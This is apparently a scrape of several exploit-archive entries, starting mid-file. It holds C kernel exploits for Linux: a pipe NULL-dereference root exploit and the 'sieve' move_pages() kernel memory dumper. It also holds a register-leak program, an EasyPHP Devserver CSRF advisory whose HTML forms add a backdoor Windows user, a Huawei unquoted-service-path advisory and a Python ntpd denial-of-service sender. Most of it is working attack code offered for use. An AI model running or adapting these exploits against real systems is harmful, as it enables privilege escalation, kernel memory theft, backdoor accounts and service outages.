    void *fasync_writers;
};

struct fasync_struct {
    int magic;
    int fa_fd;
    struct fasync_struct *fa_next;
    void *file;
};

struct pipe_inode_info2610orolder {
    /* this includes 2.4 kernels */
    unsigned long lock; // can be rw or spin
    void *next, *prev;
    char *base;
    unsigned int len;
    unsigned int start;
    unsigned int readers;
    unsigned int writers;
    /* 2.4 only */
    unsigned int waiting_readers;

    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    /* 2.6 only */
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
};

int prepare(unsigned char *buf)
{    
    struct pipe_inode_info2610orolder *info_oldest = (struct pipe_inode_info2610orolder *)buf;
    struct pipe_inode_info2616orolder *info_older = (struct pipe_inode_info2616orolder *)buf;
    struct pipe_inode_info2619orolder *info_old = (struct pipe_inode_info2619orolder *)buf;
    struct pipe_inode_info2620ornewer *info_new = (struct pipe_inode_info2620ornewer *)buf;
    struct pipe_buf_operations *ops = (struct pipe_buf_operations *)0x800;
    int i;
    int newver;
    struct utsname unm;

    i = uname(&unm);
    if (i != 0) {
        printf("unable to get kernel version\n");
        exit(1);
    }

    if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '2' && unm.release[5] >= '0' && unm.release[5] <= '9') {
        fprintf(stdout, " [+] Using newer pipe_inode_info layout\n");
        newver = 3;
    } else if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '1' && unm.release[5] >= '7' && unm.release[5] <= '9') {
        fprintf(stdout, " [+] Using older pipe_inode_info layout\n");
        newver = 2;
    } else if (strlen(unm.release) >= 5 && unm.release[2] == '6') {
        fprintf(stdout, " [+] Using older-er pipe_inode_info layout\n");
        newver = 1;
//    } else if (strlen(unm.release) >= 5 && unm.release[2] >= '4') {
//        is_old_kernel = 1;
//        newver = 0;
    } else {
        fprintf(stdout, " [+] This kernel is still vulnerable, but I can't be bothered to write the exploit.  Write it yourself.\n");
        exit(1);
    }

    /* for most of these what will happen is our write will
       cause ops->confirm(/pin) to be called, which we've replaced
       with own_the_kernel
       for the 2.6.10->2.6.16 case it has no confirm/pin op, so what gets
       called instead (repeatedly) is the release op
    */
    if (newver == 3) {
        /* uncomment for DEBUG_SPINLOCK */
        //info_new->magic = 0xdead4ead;
        /* makes list_head empty for wake_up_common */
        info_new->next = &info_new->next;
        info_new->readers = 1;
        info_new->writers = 1;
        info_new->nrbufs = 1;
        info_new->curbuf = 1;
        for (i = 0; i < PIPE_BUFFERS; i++)
            info_new->bufs[i].ops = (void *)ops;
    } else if (newver == 2) {
        /* uncomment for DEBUG_SPINLOCK */
        //info_old->magic = 0xdead4ead;
        /* makes list_head empty for wake_up_common */
        info_old->next = &info_old->next;
        info_old->readers = 1;
        info_old->writers = 1;
        info_old->nrbufs = 1;
        info_old->curbuf = 1;
        for (i = 0; i < PIPE_BUFFERS; i++)
            info_old->bufs[i].ops = (void *)ops;
    } else if (newver == 1) {
        /* uncomment for DEBUG_SPINLOCK */
        //info_older->magic = 0xdead4ead;
        /* makes list_head empty for wake_up_common */
        info_older->next = &info_older->next;
        info_older->readers = 1;
        info_older->writers = 1;
        info_older->nrbufs = 1;
        info_older->curbuf = 1;
        /* we'll get called multiple times from free_pipe_info
           but it's ok because own_the_kernel handles this case
        */
        for (i = 0; i < PIPE_BUFFERS; i++)
            info_older->bufs[i].ops = (void *)ops;
    } else {
        /*
        different ballgame here, instead of being able to 
        provide a function pointer in the ops table, you 
        control a base address used to compute the address for 
        a copy into the kernel via copy_from_user.  The 
        following should get you started.
        */
        /* lookup symbol for writable fptr then trigger it later
           change the main write in the one thread to write out 
           pointers with the value of exp_state->exploit_kernel
        */
        info_oldest->base = (char *)0xc8000000;
        info_oldest->readers = 1;
        info_oldest->writers = 1;
        return 0;
    }

    ops->can_merge = 1;
    for (i = 0; i < 16; i++)
        ((void **)&ops->map)[i] = exp_state->own_the_kernel;

    return 0;
}

int requires_null_page = 1;

int get_exploit_state_ptr(struct exploit_state *ptr)
{
    exp_state = ptr;
    return 0;
}

int trigger(void)
{
        char buf[128];
        int fd;
    int i = 0;

    /* ignore sigpipe so we don't bail out early */
    signal(SIGPIPE, SIG_IGN);

    start_thread(go_go_speed_racer, NULL);

    fprintf(stdout, " [+] We'll let this go for a while if needed...\n");
    fflush(stdout);

        while (!exp_state->got_ring0 && i < 10000000) {
        fd = pipefd[1];
        sprintf(buf, "/proc/self/fd/%d", fd);
        fd = open(buf, O_WRONLY | O_NONBLOCK);
        if (fd >= 0) {
            /* bust spinlock */
            *(unsigned int *)NULL = is_old_kernel ? 0 : 1;
            write(fd, ".", 1);
            close(fd);
        }
        i++;
        }

    if (!exp_state->got_ring0) {
        fprintf(stdout, " [+] Failed to trigger the vulnerability.  Is this a single processor machine with CONFIG_PREEMPT_NONE=y?\n");
        return 0;
    }

    return 1;
}

int post(void)
{
//    return RUN_ROOTSHELL;
    return FUNNY_PIC_AND_ROOTSHELL;
}
HireHackking 
/* written by Ingo Molnar -- it's true because this comment says the exploit
   was written by him!
*/

#include <stdio.h>
#include <sys/syscall.h>

unsigned int _r81;
unsigned int _r82;
unsigned int _r91;
unsigned int _r92;
unsigned int _r101;
unsigned int _r102;
unsigned int _r111;
unsigned int _r112;
unsigned int _r121;
unsigned int _r122;
unsigned int _r131;
unsigned int _r132;
unsigned int _r141;
unsigned int _r142;
unsigned int _r151;
unsigned int _r152;

int leak_it(void)
{
	asm volatile (
	".intel_syntax noprefix\n"
	".code32\n"
	"jmp label1\n"
	"farcalllabel1:\n"
	".code64\n"
	"mov eax, r8d\n"
	"shr r8, 32\n"
	"mov ebx, r8d\n"
	"mov ecx, r9d\n"
	"shr r9, 32\n"
	"mov edx, r9d\n"
	"mov esi, r10d\n"
	"shr r10, 32\n"
	"mov edi, r10d\n"
	".att_syntax noprefix\n"
	"lret\n"
	".intel_syntax noprefix\n"
	"farcalllabel2:\n"
	"mov eax, r11d\n"
	"shr r11, 32\n"
	"mov ebx, r11d\n"
	"mov ecx, r12d\n"
	"shr r12, 32\n"
	"mov edx, r12d\n"
	"mov esi, r13d\n"
	"shr r13, 32\n"
	"mov edi, r13d\n"
	".att_syntax noprefix\n"
	"lret\n"
	".intel_syntax noprefix\n"
	"farcalllabel3:\n"
	"mov eax, r14d\n"
	"shr r14, 32\n"
	"mov ebx, r14d\n"
	"mov ecx, r15d\n"
	"shr r15, 32\n"
	"mov edx, r15d\n"
	".att_syntax noprefix\n"
	"lret\n"
	".intel_syntax noprefix\n"
	".code32\n"
	"label1:\n"
	".att_syntax noprefix\n"
	"lcall $0x33, $farcalllabel1\n"
	".intel_syntax noprefix\n"
	"mov _r81, eax\n"
	"mov _r82, ebx\n"
	"mov _r91, ecx\n"
	"mov _r92, edx\n"
	"mov _r101, esi\n"
	"mov _r102, edi\n"
	".att_syntax noprefix\n"
	"lcall $0x33, $farcalllabel2\n"
	".intel_syntax noprefix\n"
	"mov _r111, eax\n"
	"mov _r112, ebx\n"
	"mov _r121, ecx\n"
	"mov _r122, edx\n"
	"mov _r131, esi\n"
	"mov _r132, edi\n"
	".att_syntax noprefix\n"
	"lcall $0x33, $farcalllabel3\n"
	".intel_syntax noprefix\n"
	"mov _r141, eax\n"
	"mov _r142, ebx\n"
	"mov _r151, ecx\n"
	"mov _r152, edx\n"
	".att_syntax noprefix\n"
	);

	printf(" R8=%08x%08x\n", _r82, _r81);
	printf(" R9=%08x%08x\n", _r92, _r91);
	printf("R10=%08x%08x\n", _r102, _r101);
	printf("R11=%08x%08x\n", _r112, _r111);
	printf("R12=%08x%08x\n", _r122, _r121);
	printf("R13=%08x%08x\n", _r132, _r131);
	printf("R14=%08x%08x\n", _r142, _r141);
	printf("R15=%08x%08x\n", _r152, _r151);
	return 0;
}

/* ripped from jon oberheide */
const int randcalls[] = {
	__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
	__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
	__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
	__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
	__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
	__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
	__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
	__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
	__NR_sched_getparam, __NR_sched_get_priority_max
};

int main(void)
{
	/* to keep random stack values from being used for pointers in syscalls */
	char buf[64] = {};
	int call;
	for (call = 0; call < sizeof(randcalls)/sizeof(randcalls[0]); call++) {
		syscall(randcalls[call]);
		leak_it();
	}

}
HireHackking 
/* sieve (because the Linux kernel leaks like one, get it?)
   Bug NOT discovered by Marcus Meissner of SuSE security
   This bug was discovered by Ramon de Carvalho Valle in September of 2009
   The bug was found via fuzzing, and on Sept 24th I was sent a POC DoS
   for the bug (but had forgotten about it until now)
   Ramon's report was sent to Novell's internal bugzilla, upon which 
   some months later Marcus took credit for discovering someone else's bug
   Maybe he thought he could get away with it ;)  Almost ;)

   greets to pipacs, tavis (reciprocal greets!), cloudburst, and rcvalle!

   first exploit of 2010, next one will be for a bugclass that has
   afaik never been exploited on Linux before

   note that this bug can also cause a DoS like so:

Unable to handle kernel paging request at ffffffff833c3be8 RIP: 
 [<ffffffff800dc8ac>] new_page_node+0x31/0x48
PGD 203067 PUD 205063 PMD 0 
Oops: 0000 [1] SMP 
Pid: 19994, comm: exploit Not tainted 2.6.18-164.el5 #1
RIP: 0010:[<ffffffff800dc8ac>]  [<ffffffff800dc8ac>] 
new_page_node+0x31/0x48
RSP: 0018:ffff8100a3c6de50  EFLAGS: 00010246
RAX: 00000000005fae0d RBX: ffff8100028977a0 RCX: 0000000000000013
RDX: ffff8100a3c6dec0 RSI: 0000000000000000 RDI: 00000000000200d2
RBP: 0000000000000000 R08: 0000000000000004 R09: 000000000000003c
R10: 0000000000000000 R11: 0000000000000092 R12: ffffc20000077018
R13: ffffc20000077000 R14: ffff8100a3c6df00 R15: ffff8100a3c6df28
FS:  00002b8481125810(0000) GS:ffffffff803c0000(0000) 
knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: ffffffff833c3be8 CR3: 000000009562d000 CR4: 00000000000006e0
Process exploit (pid: 19994, threadinfo ffff8100a3c6c000, task 
ffff81009d8c4080)
Stack:  ffffffff800dd008 ffffc20000077000 ffffffff800dc87b 
0000000000000000
 0000000000000000 0000000000000003 ffff810092c23800 0000000000000003
 00000000000000ff ffff810092c23800 00007eff6d3dc7ff 0000000000000000
Call Trace:
 [<ffffffff800dd008>] migrate_pages+0x8d/0x42b
 [<ffffffff800dc87b>] new_page_node+0x0/0x48
 [<ffffffff8009cee2>] schedule_on_each_cpu+0xda/0xe8
 [<ffffffff800dd8a2>] sys_move_pages+0x339/0x43d
 [<ffffffff8005d28d>] tracesys+0xd5/0xe0


Code: 48 8b 14 c5 80 cb 3e 80 48 81 c2 10 3c 00 00 e9 82 29 f3 ff 
RIP  [<ffffffff800dc8ac>] new_page_node+0x31/0x48
 RSP <ffff8100a3c6de50>
CR2: ffffffff833c3be8
*/

#include <stdio.h>
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <errno.h>
#include "exp_framework.h"

#undef MPOL_MF_MOVE
#define MPOL_MF_MOVE (1 << 1)

int max_numnodes;

unsigned long node_online_map;

unsigned long node_states;

unsigned long our_base;
unsigned long totalhigh_pages;

#undef __NR_move_pages
#ifdef __x86_64__
#define __NR_move_pages 279
#else
#define __NR_move_pages 317
#endif

/* random notes I took when writing this (all applying to the 64bit case):

checking in a bitmap based on node_states[2] or node_states[3] 
(former if HIGHMEM is not present, latter if it is)

each node_state is of type nodemask_t, which is is a bitmap of size 
MAX_NUMNODES/8

RHEL 5.4 has MAX_NUMNODES set to 64, which makes this 8 bytes in size

so the effective base we're working with is either node_states + 16 or 
node_states + 24

on 2.6.18 it's based off node_online_map

node_isset does a test_bit based on this base

so our specfic case does: base[ourval / 8] & (1 << (ourval & 7))

all the calculations appear to be signed, so we can both index in the 
negative and positive direction, based on ourval

on 64bit, this gives us a 256MB range above and below our base to grab 
memory of 
(by passing in a single page and a single node for each bit we want to 
leak the value of, we can reconstruct entire bytes)

we can determine MAX_NUMNODES by looking up two adjacent numa bitmaps,
subtracting their difference, and multiplying by 8
but we don't need to do this
*/

struct exploit_state *exp_state;

char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak";

int get_exploit_state_ptr(struct exploit_state *ptr)
{
	exp_state = ptr;
	return 0;
}

int requires_null_page = 0;

void addr_to_nodes(unsigned long addr, int *nodes)
{
	int i;
	int min = 0x80000000 / 8;
	int max = 0x7fffffff / 8; 

	if ((addr < (our_base - min)) ||
	    (addr > (our_base + max))) {
		fprintf(stdout, "Error: Unable to dump address %p\n", addr);
		exit(1);
	}

	for (i = 0; i < 8; i++) {
		nodes[i] = ((int)(addr - our_base) << 3) | i;
	}

	return;
}

char *buf;
unsigned char get_byte_at_addr(unsigned long addr)
{
	int nodes[8];
	int node;
	int status;
	int i;
	int ret;
	unsigned char tmp = 0;

	addr_to_nodes(addr, (int *)&nodes);
	for (i = 0; i < 8; i++) {
		node = nodes[i];
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno != ENODEV)
			tmp |= (1 << i);
	}
	
	return tmp;
}	

void menu(void)
{
	fprintf(stdout, "Enter your choice:\n"
			" [0] Dump via symbol/address with length\n"
			" [1] Dump entire range to file\n"
			" [2] Quit\n");
}

int trigger(void)
{
	unsigned long addr;
	unsigned long addr2;
	unsigned char thebyte;
	unsigned char choice = 0;
	char ibuf[1024];
	char *p;
	FILE *f;

	// get lingering \n
	getchar();
	while (choice != '2') {
		menu();
		fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
		choice = ibuf[0];
		
		switch (choice) {
		case '0':
			fprintf(stdout, "Enter the symbol or address for the base:\n");
			fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
			p = strrchr((char *)&ibuf, '\n');
			if (p)
				*p = '\0';
			addr = exp_state->get_kernel_sym(ibuf);
			if (addr == 0) {
				addr = strtoul(ibuf, NULL, 16);
			}
			if (addr == 0) {
				fprintf(stdout, "Invalid symbol or address.\n");
				break;
			}
			addr2 = 0;
			while (addr2 == 0) {
				fprintf(stdout, "Enter the length of bytes to read in hex:\n");
				fscanf(stdin, "%x", &addr2);
				// get lingering \n
				getchar();
			}
			addr2 += addr;
			
			fprintf(stdout, "Leaked bytes:\n");
			while (addr < addr2) {	
				thebyte = get_byte_at_addr(addr);
				printf("%02x ", thebyte);
				addr++;
			}
			printf("\n");
			break;
		case '1':
			addr = our_base -  0x10000000;
#ifdef __x86_64__
			/* 
			   our lower bound will cause us to access
			   bad addresses and cause an oops
			*/
			if (addr < 0xffffffff80000000)
				addr = 0xffffffff80000000;
#else
			if (addr < 0x80000000)
				addr = 0x80000000;
			else if (addr < 0xc0000000)
				addr = 0xc0000000;
#endif
			addr2 = our_base + 0x10000000;
			f = fopen("./kernel.bin", "w");
			if (f == NULL) {
				fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n");
				exit(1);
			}

			fprintf(stdout, "Dumping to kernel.bin (this will take a while): ");
			fflush(stdout);
			while (addr < addr2) {
				thebyte = get_byte_at_addr(addr);
				fputc(thebyte, f);
				if (!(addr % (128 * 1024))) {
					fprintf(stdout, ".");
					fflush(stdout);
				}
				addr++;
			}
			fprintf(stdout, "done.\n");
			fclose(f);
			break;
		case '2':
			break;
		}
	}

	return 0;
}


int prepare(unsigned char *ptr)
{
	int node;
	int found_gap = 0;
	int i;
	int ret;
	int status;

	totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages");
	node_states = exp_state->get_kernel_sym("node_states");
	node_online_map = exp_state->get_kernel_sym("node_online_map");

	buf = malloc(4096);

	/* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted
	   towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table,
	   which will be set for our single node -- this gives us the size of the bitmap
	*/
	for (i = 0; i < 512; i++) {
		node = i;
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno == ENODEV) {
			found_gap = 1;
		} else if (found_gap == 1) {
			max_numnodes = i;
			fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes);
			break;
		}
	}

	if (node_online_map != 0)
		our_base = node_online_map;
	/* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size
	   of each bitmap in the array our base is in the middle of
	   we've taken account for all this
	*/
	else if (node_states != 0)
		our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8)));
	else {
		fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n");
		exit(1);
	}

	return 0;
}

int post(void)
{
	return 0;
}
HireHackking 
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/EASYPHP-DEV-SERVER-REMOTE-CMD-EXECUTION.txt

[+] ISR: ApparitionSec



Vendor:
===============
www.easyphp.org



Product:
=============================
EasyPHP Devserver v16.1.1

easyphp-devserver-16.1.1-setup.exe
hash: 64184d330a34be9e6c029ffa63c903de


A complete WAMP environment for PHP development & personal web hosting.
Host with Webserver PHP, Apache, MySQL, Nginx, PhpMyAdmin,
Xdebug, PostgreSQL, MongoDB, Python, Ruby...for Windows.


Vulnerability Type:
=================================
CSRF / Remote Command Execution



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

EasyPHP Devserver dashboard runs on port 1111, the PHP code contains
mulitple RCE vectors, which can allow
arbitrary OS commands to be executed on the target system by remote
attackers, if a user visits malicious webpage or link.

The "index.php" and "explorer.php" files both contain vulnerable code that
will happily process both GET / POST RCE requests.
Below EasyPHP Code contains no CSRF token or checks whatsoever. All
attacker needs is to supply 'type' and command values.

Possibility for RFI (remote file inclusion) if the "allow_url_include=0"
setting is changed in "php.ini" configuration.
No checks or CSRF tokens for PHP include directives either, the default
however is set to Off.

e.g. RFI attempt result
Warning: include(): http:// wrapper is disabled in the server configuration
by allow_url_include=0


line 8 of "explorer.php"
======================

//== ACTIONS
==================================================================

if (isset($_POST['action'])) {

// Include and exec
if (isset($_POST['action']['request'])) {
foreach ($_POST['action']['request'] as $request) {
if ($request['type'] == 'include') include(urldecode($request['value']));
if ($request['type'] == 'exe') exec(urldecode($request['value']));
}
}
$redirect = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
header("Location: " . $redirect);
exit;
}


//////////////////////////////////////////////////

line 48 "index.php"
==================


//== ACTIONS
==================================================================

if (isset($_POST['action'])) {

// Include and exec
if (isset($_POST['action']['request'])) {
foreach ($_POST['action']['request'] as $request) {
if ($request['type'] == 'include') include(urldecode($request['value']));
if ($request['type'] == 'exe') exec(urldecode($request['value']));
}
}
sleep(1);
$redirect = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
header("Location: " . $redirect);
exit;
}

if (isset($_GET['action'])) {
// Include and exec
if ($_GET['action'] == 'include') include(urldecode($_GET['value']));
if ($_GET['action'] == 'exe') exec(urldecode($_GET['value']));
if (isset($_GET['redirect'])) {
$redirect = urldecode($_GET['redirect']);
} else {
$redirect = 'http://127.0.0.1:1111/index.php';
}
sleep(1);
header("Location: " . $redirect);
exit;
}




Exploit code(s):
===============

1) Add Backdoor User Account

<form action="http://127.0.0.1:1111/explorer.php" method="post">
<input type="hidden" name="action[request][0][type]" value="exe">
<input type="hidden" name="action[request][0][value]" value="net user EVIL
Password /add">
<script>document.forms[0].submit()</script>
</form>



2) Run "calc.exe"

<a href="http://127.0.0.1:1111/index.php?action=exe&value=calc.exe
">Clicky...</a>




Disclosure Timeline:
======================================
Vendor Notification: No replies
November 22, 2016 : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
================
Medium




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
HireHackking 
# Exploit Title: Unquoted Service Path Vulnerability in Huawei UTPS Software
# Date: Nov 16 2016
# Author: Dhruv Shah (@Snypter)
# Website: http://security-geek.in
# Contact: dhruv-shah@live.com
# Category: local
# Vendor Homepage: http://www.huawei.com/
# Version: Versions earlier than UTPS-V200R003B015D16SPC00C983
# Tested on: Windows XP , Windows 7-10 x86/x64
# CVE: CVE-2016-8769

1. Description

Huawei UTPS Software is the core software that is bundled with the
Internet Dongles, it provides it dongles to companies like Airtel ,
TATA Photon . This is the software that installs itself for the Dongle
to run on the attached machine. It installs as a service ("Photon.
RunOUC") and ("Airtel. RunOuc") with an unquoted service path running
with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.

2. Proof of Concept

 ( TATA PHOTON Dongles)
C:\Documents and Settings\Dhruv>sc qc "Photon. RunOuc"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: Photon. RunOuc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program
Files\Photon\Huawei\EC306-1\UpdateDog\ouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Photon. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

( Airtel Dongles)
C:\Documents and Settings\Dhruv>sc qc "airtel. Runouc"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: airtel. Runouc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\airtel\UpdateDog\ouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : airtel. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

3. Exploit:

A successful attempt would require the local attacker must insert an
executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.


Additional notes :

Fixed in version UTPS-V200R003B015D16SPC00C983

CVSSv3 Risk Rating
Base Score: 6.4 (AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H )
Temporal Score:  5.9 (E:F/RL:O/RC:C)

Vulnerability Disclosure Timeline:
=========================
06/09/2016   -   Contact With Vendor
06/09/2016   -   Vendor Response
15/11/2016   -   Release Fixed Version
HireHackking 
#!/usr/bin/env python

# Exploit Title: ntpd remote pre-auth Denial of Service
# Date: 2016-11-21
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: http://dumpco.re/cve-2016-7434/
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p8.tar.gz
# Version: ntp-4.2.7p22, up to but not including ntp-4.2.8p9, and ntp-4.3.0 up to, but not including ntp-4.3.94
# CVE: CVE-2016-7434

import sys
import socket

if len(sys.argv) != 3:
    print "usage: " + sys.argv[0] + " <host> <port>"
    sys.exit(-1)


payload = "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"

print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
print "[+] Done!"